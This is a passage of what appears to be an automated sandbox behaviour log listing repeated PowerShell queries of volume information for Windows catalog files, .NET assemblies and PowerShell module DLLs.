                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
